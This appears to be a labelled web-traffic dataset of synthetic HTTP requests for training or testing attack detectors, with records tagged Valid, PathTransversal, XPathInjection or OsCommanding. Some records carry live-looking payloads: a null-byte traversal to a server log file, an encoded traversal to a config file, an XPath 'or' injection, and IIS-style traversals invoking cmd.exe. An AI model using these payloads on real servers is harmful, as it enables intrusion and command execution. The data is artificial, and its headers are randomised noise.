User-Agent: ygisdsaN8 (ohVefkwfU; nJZ3mTyfr; tuq-zJxFU; nDr7noR)
UA-CPU: 68000
UA-Disp: 740,6527,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 5624x146
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: compress
Upgrade: hyt/2.3, usSsro/3.3, qhndkt/3.2, ay8/2.2
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41767
Start - Id: 46115
class: PathTransversal
POST /oQ-sUIb8Wg2Qjg-pts/oF6gDT/lnTsomyoan.jpeg? HTTP/1.1
Content-Length: 207
Content-Language: edaiEu
Content-Encoding: identity
Content-Location: http://nE6m.uk/5xes/iRstox/avtEIuhe/n1cd.png
Content-MD5: eXVSeGVob2VvYW1kbnlzZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 09 Feb 09 23:45:45 CET
Last-Modified: Fri, 09 Jun 06 04:56:53 UTC
Host: www.ahisMc6.net
Connection: keep-alive
Accept: audio/x-wav;q=0.0, audio/x-wav
Accept-Charset: iso-8859-15;q=0.0, windows-1252;q=0.5, windows-1254;q=0.7
Accept-Encoding: gzip;q=0.0, deflate, compress, deflate, compress
Accept-Language: tn4-eTcthyrw;q=0.8, e-mA, t-e, trinsI-n;q=0.6, i1r95Ha-t8tam6e2
Cache-Control: no-transform
Client-ip: 128.211.32.12
Cookie: ci=nodefdeletet;ughoAecAameyome=t@gtwAI%w tth8u
Cookie2: $Version="304"
Date: Sun, 08 Jun 08 11:33:34 CET
ETag: W/"oSiqqhx9H424PVN"
Expect: oA66net
From: sneTb@ntoa.org
If-Modified-Since: Mon, 08 Feb 10 04:49:56 CET
If-Unmodified-Since: Fri, 16 Apr 10 08:58:28 UTC
If-Match: "vOC6dqi_Niksxo.@ZY7"
If-None-Match: *
If-Range: "5uY0AEEPzhrB.zdy.6_L"
Max-Forwards: 083
MIME-Version: 6.9
Pragma: utcehiu3='tuIewp'
Proxy-Authorization: NTLM dUF3bnVnc2Vhb3M3SGViSEVpU2NhbmFhdGVtY2dzNG5oczdob2FlZTVqczlhZ2c=
Authorization: Digest nonce
Range: -03018,-4474
Referer: http://www.d5vniia.uk/hwwtnp/ghk9Must/owttp0/ebtrs.msf
TE: gzip;q=0.8,chunked,trailers
Trailer: From
User-Agent: i2edr/6.6.5
UA-CPU: StrongARM
UA-Disp: 013,8329,8
UA-Color: color16
UA-Pixels: 1090x096
Via: 1.9 21.20.191.145, 1.8 www.plef.jpeg, 5.0 www.sni2.jpeg:59774
Transfer-Encoding: deflate
Upgrade: cRpj/3.7
Warning: 800 35.212.44.243 "nmnuianytv69wdnRo" 
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

l4loHu8md=7369127&etiin9ik5exs=tJQ&dropRpoCjR=OfevsNvv&9tn5h=../../../../var/log/access_log%00.html&soos=Dtn&BYnfZg5vL8@xml=emochan&hp0ealta=oskt:ege |ehe&s5tec=49425163&TiynRds=rR.P.GYaiJQ

End - Id: 46115
Start - Id: 18602
class: Valid
GET /sYvaru8xpCqmb.nsf?nyld=aslsexlL&yevenKXswuz=g+d&aG=tuyy&orn=6182345&untoes7r=aeit3ine&tid=nkD&heyQta6oiyuAu=E+bdruJvss&0see=teWlusrkteVssystem+eovbscriptY&upnp=noL-dI&3dhy=a&tKee5atnsath=2652513549&uuhkrila5sissQ=4xmdsisti HTTP/1.0
Host: 191.184.210.107
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=1
Client-ip: 92.140.82.89
Cookie: v3srEm9=611458535;nemeh=f h
Cookie2: $Version="5"
Date: Mon, 02 Jul 07 03:18:30 GMT
ETag: "ODDDI7QMbANBrNZGX"
Expect: eaat1ww
From: issa@v6tset.fr
If-Modified-Since: Mon, 21 Mar 05 02:30:20 CET
If-Unmodified-Since: Wed, 12 May 04 10:22:35 CET
If-Match: *
If-None-Match: "acn8_wX9A-o6kQkyv"
If-Range: *
Max-Forwards: 7560
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: Digest opaque="uilai"
Range: 0-15536,8-008663
Referer: http://awrt.be/HsEs/2awCA.ace
TE: chunked;q=0.7,gzip;q=0.4
Trailer: Accept
User-Agent: Mozilla/7.5 (compatible; MSIE 4.5; SunOS sun4u; snne7an5ro; eYedrada)
UA-CPU: MIPS
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8012x674
Via: FTP/8.1 www.oeHas.png
Transfer-Encoding: gzip
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 74074067
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18602
Start - Id: 408
class: Valid
GET /na78kgLV8KHz/wqeautoexecB/Jrd7mSoesroadoeiqi/e8eEtb/iruageptr8thenie7lam/uec1Rn8echte9sr.aspx?jB3NVGYK=7&sh=biMzBBSE5-a&ueDLsNtl=osig8asebbN&measNeTnuOpEs=3960684&ombtamrdnit4eEa=liI HTTP/1.1
Host: www.set0otapo.com
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: compress, gzip;q=0.7, identity;q=0.2
Accept-Language: AxEn-hs;q=0.4, v-o;q=0.7, 3r8gu1ht-dpb0eEH;q=0.1, wa0o-ntdobiet;q=0.5, t1AEs6-9ese
Cache-Control: no-cache
Client-ip: 5.95.31.54
Cookie: pAnt1getiequsT=5641751;xbrsAnr=019;wisnp=ipv;ls6eae=h;iee4elsf=2529
Cookie2: $Version="9"
Date: Wed, 31 Mar 04 24:08:00 UTC
ETag: W/"4edizi_lYTI9-MC7luU"
Expect: 100-continue
From: rPtoKwaw@nOdai.biz
If-Modified-Since: Wed, 02 Aug 06 10:09:56 CET
If-Unmodified-Since: Wed, 24 Oct 07 17:16:21 UTC
If-Match: *
If-None-Match: "Gul.oITLpsvJN_HWU"
If-Range: "4oR@ouo4d39umt8I"
Max-Forwards: 13
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic Y3RyYWIyblk6dWV3bjJxaA==
Authorization: Basic YTV0ZW86ZHZlZ2JjaQ==
Range: 63476-77033,-529,5-
Referer: http://e3e4ta.cz/irfoate/itil/eMuec/wntaesa/arOhal.dll
TE: trailers,chunked;q=0.9,chunked
Trailer: Trailer
User-Agent: eIm4m (o_0s65bP70; mqLmCcU; o.Zwoo; 5ZeDuvnzA)
UA-CPU: Sparc
UA-Disp: 8197,4244,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7545x2141
Via: 7.2 www.3ijgOo.css
Transfer-Encoding: deflate
Upgrade: sajgfN/7.8, n2wam/2.4
Warning: 942 91.154.237.154 "h59jnrdncehalTSdatn" "Tue, 19 Oct 04 16:05:21 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 408
Start - Id: 49733
class: XPathInjection
GET /qj/rV7/eloEsfpskuxc8/tFxUF/me0pZ/daghaouT281/otl/itonPanoyndne.tiff?cRodbinB_=6lrad&btoe=dlnaa%2F3TCybs%2Fo7oe%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D6%5D+++or+%27aer7v%27++++%3D++%27&aueEgro1or8tmcr=rand&Iojkm=P+havingE&tiel6so=lh5xp_Y4wc%3A%24nra%3A&qhHoertrhw56s=abatl HTTP/1.1
Host: www.atno.cz
Connection: close
Accept: video/quicktime;q=0.2
Accept-Charset: iso-2022-jp;q=0.9, windows-1252, big5
Accept-Encoding: *;q=0.6
Accept-Language: cYu-eu1l, ennSc-xtEEs, mawyoz-In
Cache-Control: max-stale
Client-ip: 24.134.122.55
Cookie: csee2hyes5oe1e=aipTSl;eerme=vVeB_Qlo;Gyformupdate6e4Q2.=tropenntae  %
Cookie2: $Version="05"
Date: Sat, 01 Nov 08 10:22:48 UTC
ETag: W/"ZN9G@iaw2.uxVk7."
Expect: 100-continue
From: ejeriHt@tvteeteb.fr
If-Modified-Since: Sun, 14 Mar 10 06:15:11 UTC
If-Unmodified-Since: Sun, 02 Sep 07 08:45:12 CET
If-Match: *
If-None-Match: "A5d0@9cR@oiQehAe"
If-Range: *
Max-Forwards: 4138
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic aXd5RWRhbmE6OHFuOGVuNGU=
Authorization: Basic aXRhc2xmMm46NGJhMw==
Range: -37003,-5,-1
Referer: /7itteb/t8penote/tbepeih.png
TE: trailers,gzip
Trailer: Connection
User-Agent: tQw7R_Bt http://www.kyofyn.com
UA-CPU: StrongARM
UA-Disp: 3953,5444,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 334x787
Via: 3.6 www.okiwy.tiff, HTTP/6.0 www.hsya.tiff
Transfer-Encoding: compress
Upgrade: Nxie/2.9, waree/1.4, eaTli/1.5
Warning: 623 www.Cxer.gif "wenr" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49733
Start - Id: 3776
class: Valid
GET /pDQ1gWPf_UCvI1MhA5Ij/uIk/iciqo/wM@Q1Z52DZ0/398DWrPimq_KdGtU/wF_ti6zs1Z-C5-K/o0mmsainsra.tiff?oyr=0ead0saegewi&iNo4pe73b3=49 HTTP/1.0
Host: 179.232.68.48
Connection: close
Accept: text/*
Accept-Charset: windows-1255, x-mac-cyrillic, utf-8;q=0.4, iso-8859-7, iso-8859-1
Accept-Encoding: 
Accept-Language: fe8snb-htEn
Cache-Control: no-transform
Client-ip: 235.59.125.79
Cookie: 4iaig2iotdol=fX@;_icmdMsb=hrp oc:2h;boit8ihrA9t4t9n=2;uIczU2zbodytb=070168969;passwdov4sam=ruXyt
Cookie2: $Version="159"
Date: Mon, 03 Nov 08 11:17:14 GMT
ETag: W/"Cw5CBzPYBcAwz@Gj"
Expect: msle9rna=tnnrdc
From: ueatims@oatosfu.net
If-Modified-Since: Mon, 09 Feb 09 12:25:50 CET
If-Unmodified-Since: Mon, 14 May 07 24:30:43 GMT
If-Match: "Z2blLjKCvmP@9fQ6ss4k"
If-None-Match: "ewVhSrT73W2r.R4qKb"
If-Range: Sat, 30 Aug 08 04:30:19 UTC
Max-Forwards: 952
MIME-Version: 4.3
Pragma: vErs=uo
Proxy-Authorization: Basic cnN3bGVzbzpSc2VlaQ==
Authorization: Basic RU5zc2xpOjV0VGFtdFQ=
Range: -60328,-3384,331-
Referer: http://0aarnezn.fr/ioae/eetf/Fuoxtcii.shtml
TE: deflate;q=0.0,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (X11; U; Open BSD i586 2.5; nr-1o; rv:4.7.3) Gecko/38260530
UA-CPU: PowerPC
UA-Disp: 599,9039,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0475x7705
Via: 8.6 7.92.49.237, 4.2 www.rtke.css
Transfer-Encoding: gzip
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 946 207.80.85.43 "ioeyradhgStlaUn1wz" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3776
Start - Id: 44278
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.eoatn.net
Connection: close
Accept: audio/*;q=0.7, text/*, audio/x-wav
Accept-Charset: *;q=0.5
Accept-Encoding: identity
Accept-Language: tehj-bTeeag, tlaTs-orenhn;q=0.7, n3Lrohtt-j065coee, 9no0it-rn0oEeee, i-Ehtx
Cache-Control: no-cache
Client-ip: 192.246.21.91
Cookie: chcoeeseaHu=8abbsanw7allu 
Cookie2: $Version="864"
Date: Mon, 02 Aug 04 18:51:59 CET
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Sat, 21 May 05 20:55:45 CET
If-Match: "fX3vv9nhjLUGEf3"
If-None-Match: *
If-Range: "QwmlmmG7j.GuYQ4NBEc8"
Max-Forwards: 15
MIME-Version: 6.9
Pragma: tdrp=f
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: Basic dHNjdDo2N2R3bnJl
Range: 1630-9,-816
Referer: http://www.mtlscUde.be/aujte1ge/wsdty/Npxc/s4siiiuq/Tn0cdywn.msf
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 6.1; 1i-st; rv:4.0.0) Gecko/34777400
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: igk9/5.4 www.6gaSer.htm, 9.8 5.18.32.190, chpde/5.9 134.151.163.153
Transfer-Encoding: gzip
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44278
Start - Id: 43974
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 102.83.103.52
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale=34
Client-ip: 9.225.171.68
Cookie: 5f6IlAr=3;t1kAXZiZKgroup byKS=positionnhtacces8Rsrf;hRiozUa=eaa8
Cookie2: $Version="45"
Date: Thu, 27 Apr 06 11:59:41 CET
ETag: W/".M73M1s.vEWh-qdTs"
Expect: Teocbl
From: axenii@lMdner.de
If-Modified-Since: Fri, 23 Sep 05 06:40:53 GMT
If-Unmodified-Since: Sat, 01 May 04 17:53:50 CET
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: "nghSSiXZqI6yCGLjsR.n"
If-Range: Wed, 26 Dec 07 09:23:21 CET
Max-Forwards: 145
MIME-Version: 3.0
Pragma: parnlr='erdoa2c'
Proxy-Authorization: Digest cnonce="toatla"
Authorization: NTLM aW5yYXR2ZWVvb2Vlcmllc2VpeG51ZU50ZWhtc1M5b3RtbWpucWhTY3IyYQ==
Range: 2873-08
Referer: /i3nghta/ovanye/i09tin.php3
TE: trailers
Trailer: Referer
User-Agent: Mozilla/1.0 (compatible; 1lfmjreaou; Linux i386; negfe6H)
UA-CPU: x86
UA-Disp: 3500,2136,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: odna/0.5 www.llklra35.gif, htiw/3.3 www.iygyyfy.jpg:426
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 552046622508653273
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43974
Start - Id: 8
class: Valid
GET /ez/FQY/9WcO64.dll?n7soevann9r=ef9UgkzcZ&Nirldiea=bgbody30 HTTP/1.1
Host: www.Seotn.fr:8
Connection: keep-alive
Accept: application/*
Accept-Charset: ks_c_5601-1987, windows-1252;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 198.201.173.41
Cookie: oarraatavd=tisrP3n5mopsy;C.psdnB=87378
Cookie2: $Version="8"
Date: Sun, 22 Jan 06 14:12:41 UTC
ETag: W/"8iZ39RWZewgvp0wTVy"
Expect: 100-continue
From: 4atoe@ehNulvLa.net
If-Modified-Since: Mon, 14 Jan 08 23:43:42 UTC
If-Unmodified-Since: Wed, 29 Nov 06 01:48:48 CET
If-Match: "Ea4h_iuEGBpuhik0E"
If-None-Match: *
If-Range: *
Max-Forwards: 256
Pragma: vthu=ifdlS4il
Authorization: NTLM cXN4dkFlYWx0d1NiZW9sdWF0MGVwdXc4dGE5c2FpZVRmZWU5
Range: -8,-6
Referer: /esPaRnt/nwRAaDml.css
TE: deflate,gzip,gzip;q=0.7
Trailer: Host
User-Agent: issp4w (a-x8hHnw86; im4ncXnI; tNHLom; kuWe@@Rcf; tyhUff7zrV)
UA-CPU: MIPS
UA-OS: Mac OS X
UA-Color: color8
Via: FTP/9.5 www.lEiieigy.jpg:2, HTTP/1.8 www.ie3anshn.css, 6.2 240.233.126.158:4
Transfer-Encoding: compress
Warning: 092 www.bnp6yotc.jpg "It5ru0hZb2OxuMoerlh" "Fri, 11 Dec 09 19:58:51 GMT"
X-Forwarded-For: 20.155.227.227
X-Serial-Number: 157557837076027

null

End - Id: 8
Start - Id: 17700
class: Valid
GET /wwZ./yXIKYkW/ec@wRIaaa_JZz6p/wtNyrcuS/nIzA3id7esee/we5wjpl/hcreittSsoertdm.js?wnrtsgevbaeiao=697918925&wrno=053139&oagjlaeaeT1=%3Et+eltsaahIaselecto1&C@6autoexechXOY77Eid=gekilocation1ErUseiei&zatwhereiHF=9gQ.z3&lNo_Z6Kreplacen=ractxmld&rg8s2oOu31N2gtl=70 HTTP/1.1
Host: www.efai.com:1
Connection: lo5a
Accept: text/*, audio/basic, application/zip
Accept-Charset: *
Accept-Encoding: compress;q=0.1, gzip;q=0.2, gzip, deflate, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 205.76.5.113
Cookie: eTshvhsrdtGml=5682316;hn=vgedpluE2O;M0homeOallHdwa@Heval=38;ctts=<[;tseE=5;2@.RnhJG=ehdci~G:
Cookie2: $Version="8"
Date: Wed, 15 Jun 05 18:09:11 UTC
ETag: W/"RlvvOiuDFYgKT3Y@_L"
Expect: dIhE=yjonsoC;cjwnf
From: ham2@rhhtcs.de
If-Modified-Since: Tue, 29 Jan 08 08:19:08 UTC
If-Unmodified-Since: Tue, 29 Nov 05 02:00:35 UTC
If-Match: *
If-None-Match: "CCZJuM4vb4EJrOhAgpk"
If-Range: *
Max-Forwards: 194
MIME-Version: 9.0
Pragma: or='ex4in'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: NTLM OGF0clhodWF1ZnJ4Z2VtTG9lRXBvYXBpZTlsYXN0cmU=
Range: -579,-690
Referer: http://www.eflecazG.gov/crcaa.doc
TE: deflate;q=0.7,gzip;q=0.8
Trailer: Upgrade
User-Agent: Mozilla/2.9 (X11; U; SunOS sun4u 5.4; aa-ll; rv:1.5.8) Gecko/85541482
UA-CPU: x86
UA-Disp: 4852,629,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: FTP/6.2 www.stozs.css, ePnigi/4.0 www.lbor.htm, 2.0 www.aEioept.htm
Transfer-Encoding: compress
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 36.178.47.35
X-Serial-Number: 1990528944468
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17700
Start - Id: 23375
class: Valid
GET /saUqEqvbovmWZZ1M6EX/fbvptf7/ermIaask9ox0/envfjze3h4gDQGXiwn_k/to/tho/N9o4te/oadrt9aqtRseirwie1/nedoxiboHnee9rs/u7bG/s_IXe9.shtml? HTTP/1.1
Host: 79.208.84.17
Connection: keep-alive
Accept: text/xml;q=0.0, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: ttjacki-rfarye, tnn5rrie-7;q=0.4, uauoaix-srth
Cache-Control: max-age=0
Client-ip: 250.226.160.138
Cookie: aHdtH=ay;iaib9ezssgat=438081923;t4oteojxidikaw=D|rhwindow.openhste0Uai
Cookie2: $Version="538"
Date: Mon, 21 May 07 22:53:04 CET
ETag: W/"qq6_q7l5V58IXvL"
Expect: 100-continue
From: kisol@le4e.uk
If-Modified-Since: Thu, 13 Nov 08 17:50:19 GMT
If-Unmodified-Since: Sun, 13 Aug 06 07:27:41 GMT
If-Match: *
If-None-Match: "8LKZvGrn2drcYsNv."
If-Range: Mon, 14 Jan 08 09:28:46 UTC
Max-Forwards: 7
MIME-Version: 3.9
Pragma: av='ioa'
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: Basic c25uaW10bWg6cHl0eHRzNDA=
Range: -498369,5-,-5
Referer: /ar1eir/xtkaEs/cowr/ruaieat.sh
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.9 (compatible; Konqueror/0.4; Windows NT; gtxotoro; lianoj9s; ErUm7emnV)
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 506x4645
Via: 2.1 www.snySdea1.htm
Transfer-Encoding: deflate
Upgrade: onIt/4.0, 96i/3.9, ud3/7.4
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 996709990396001467
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23375
Start - Id: 36361
class: PathTransversal
GET /ry5oepT.css?o8smAijcrT=3G_s0I&aa2lneteoa=%3AStlscript+oc%5BUa%3C6evd&rdx3eb9oh8o0wNc=copytcnwheresudy&esycl=olatdeeaPOhEElaac&rRsqtt=r.liUFpA&hiaL1tlrl=hNnode407edocumentegdiecho%5D&hrwEn2lcvoLggE=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FtDemmn.conf&tt9=021 HTTP/1.1
Host: 18.232.153.114
Connection: keep-alive
Accept: application/*;q=0.8, image/*;q=0.0, audio/x-wav
Accept-Charset: big5;q=0.3, euc-kr, macintosh;q=0.5, koi8-r, windows-1255
Accept-Encoding: 
Accept-Language: ee-hn, carr-rtSo
Cache-Control: no-store
Client-ip: 74.137.160.134
Cookie: lo9etstxsuueoii=44745446;emmlerSesfetdc=passwddec;edt=837;Oztsttteen7=3;mlgcee4waX=raccepteiguntiycr/at
Cookie2: $Version="345"
Date: Fri, 23 Jun 06 20:30:47 GMT
ETag: W/"FVdxZvFAz4j68bNZ95W0"
Expect: eatl
From: sotSFlSe@qiksat.biz
If-Modified-Since: Tue, 10 Aug 04 06:25:39 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:20:53 GMT
If-Match: "Rll_MEez1Nm1-@4VHONL"
If-None-Match: *
If-Range: *
Max-Forwards: 9008
MIME-Version: 9.4
Pragma: ypgo=nl9i
Proxy-Authorization: Digest nonce
Authorization: Basic dDhhbmNydDpzb3Y0ZQ==
Range: 75-618834,757-411,77394-267269
Referer: /ebTa/vleciioe/fgiersj/zPeoQe/yOoeIas.txt
TE: gzip
Trailer: Authorization
User-Agent: f4ahaiie (aIqZgge19r; lebclc; q0eFPyIM4; hnjEdhHa4Z)
UA-CPU: MIPS
UA-Disp: 930,1675,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6269x194
Via: 7.5 www.Wlc2he.jpg, 9.0 www.p6elya.js
Transfer-Encoding: deflate
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 864 193.255.239.241 "chohneoi" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36361
Start - Id: 32047
class: Valid
GET /e-xLzL.@EG31uNV/7fm9r/lvhTJrdGfi2oM.png?itbnreemdtrf=s2%40-4ka7nAe&itnhapsiiah=n&ithli8c=Ia&HFGr5NUg=5091496236&thio0rdteetarNg=1u&Fa5ipihhtnudlOe=szaM&qnVoha7an=0&ec=epuo+rn%7Co&M2Yktelnetou=Tm HTTP/1.0
Host: 172.179.179.210:80
Connection: xesaIwf
Accept: application/postscript;q=0.0, image/*
Accept-Charset: windows-1251, euc-tw, macintosh;q=0.0, euc-cn, x-mac-korean
Accept-Encoding: gzip, deflate
Accept-Language: tooe5-ersrept, ee-inur, nne-up, wi9rgEh0-yfr
Cache-Control: ln='ca6'
Client-ip: 75.172.15.208
Cookie: q2TU06havingMn=vusSr;.rKI4JK2pbody=eeooeB;Nq0e1ado=otVn-a7l%t;w.autoexecS6IycH=0j0nsneoi
Cookie2: $Version="7"
Date: Sun, 09 Sep 07 23:29:22 GMT
ETag: "rMby0oEYpb43U340YH"
Expect: 100-continue
From: 7Shh@remFh.cz
If-Modified-Since: Wed, 24 Aug 05 22:37:48 GMT
If-Unmodified-Since: Tue, 30 May 06 03:14:20 GMT
If-Match: "gnHH1U.2mML2.Xar5"
If-None-Match: "VR8kxpSdkMB-..tGcI"
If-Range: "49Euc6OpK@QRqNE4k"
Max-Forwards: 06
MIME-Version: 3.7
Pragma: oxfaa='iettia'
Proxy-Authorization: Basic YVlmZDo1c3Ny
Authorization: NTLM MTlzYWVzN2F0bmNhdGlmbGhwZHNkYWFhb3lVYW5BeWh1
Range: 23518-
Referer: http://www.Odeieua.uk/cpiw/phale/tp6actl/h9trl.pdf
TE: chunked;q=0.7,trailers,chunked
Trailer: If-Range
User-Agent: Utelhrlh
UA-CPU: x86
UA-Disp: 6016,019,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.7 209.194.21.172
Transfer-Encoding: 1rtee
Upgrade: nswin/2.0, nrnelw/2.2
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 158.151.229.231
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32047
Start - Id: 28860
class: Valid
GET /iXB.dll? HTTP/1.1
Host: www.iijl31qh.it
Connection: keep-alive
Accept: application/x-tar;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 54.76.144.41
Cookie: ptoojrpaaahwe=3878;fgdwhemRiTuwogu=l0rBPGIa0WX;5aihbbNuu=mg3/;IdhraoaiMk=nSdTzr;uelcnsaonBuH9s=766214129;M2xmlpIgr=2584397
Cookie2: $Version="402"
Date: Fri, 24 Jun 05 01:58:17 UTC
ETag: W/"IHA-3nrxci2TQoRq0U"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Wed, 03 Jun 09 22:04:52 CET
If-Unmodified-Since: Mon, 23 Jan 06 04:43:07 CET
If-Match: *
If-None-Match: "urBnQZQD@J_VSxX"
If-Range: *
Max-Forwards: 196
MIME-Version: 3.3
Pragma: la7eyodl=bbe
Proxy-Authorization: Basic cjJhazplbmlDdWZp
Authorization: Basic bmhoa1F0a2k6c3N0b2M=
Range: -0,-10
Referer: http://www.lkhtnv.org/eg9ht.sh
TE: deflate
Trailer: If-Modified-Since
User-Agent: oIr5tswn (nSlIMjQZZ; i.rdr8To)
UA-CPU: x86
UA-Disp: 246,885,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 122x5513
Via: HTTP/1.7 151.137.117.19, FTP/5.0 www.Ete7.jpeg
Transfer-Encoding: compress
Upgrade: utaps/8.7, onEusT/9.3
Warning: 052 www.sEcXniz.tiff:364 "yi1rf3pheepna5h" 
X-Forwarded-For: 102.241.28.31
X-Serial-Number: 687925565922143
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28860
Start - Id: 28824
class: Valid
GET /jest6urbmn/FFnph-HNoWlC/oaV/rGYrxJRAXcrwwB5p6B/YS@rDRxkr7_EeQo.php4?hrl=d3.&ecc=+rkcuhScgrxtermbinMah&rutl=3&nt=ahnfhshaa1hechoqqsami&s9wehd=hesatg%2F%28nenvz HTTP/1.0
Host: 140.41.121.45
Connection: hd7asa
Accept: text/*;q=0.9, application/x-tar;q=0.3, video/mpeg;q=0.4
Accept-Charset: cp-936;q=0.2, x-mac-ce
Accept-Encoding: 
Accept-Language: *
Cache-Control: e9mju9ab='ssknreid'
Client-ip: 95.230.97.11
Cookie: iOeac=ytshieaCtknodesrtmpltcrn~;nraQb0tttmi5i5=27;cnoin1Eteestry=bdeeoQfhten;au=0499;ettteuaOh8=504430
Cookie2: $Version="138"
Date: Tue, 16 Aug 05 12:11:41 GMT
ETag: W/"D-LFA3Yi1z1Rsvxri"
Expect: d4sbea=beMwk
From: 4zbw@syof.net
If-Modified-Since: Tue, 12 Jun 07 24:44:56 UTC
If-Unmodified-Since: Sat, 25 Nov 06 09:45:04 UTC
If-Match: *
If-None-Match: "7.A1.ua-I5y368W"
If-Range: Wed, 15 Jun 05 16:17:25 GMT
Max-Forwards: 6993
MIME-Version: 3.0
Pragma: see='m'
Proxy-Authorization: hdae faMstat=0egsty
Authorization: e0ata8 dtcmu=gnr4iat
Range: -655480,928-436
Referer: /agethd/za13nivr.php
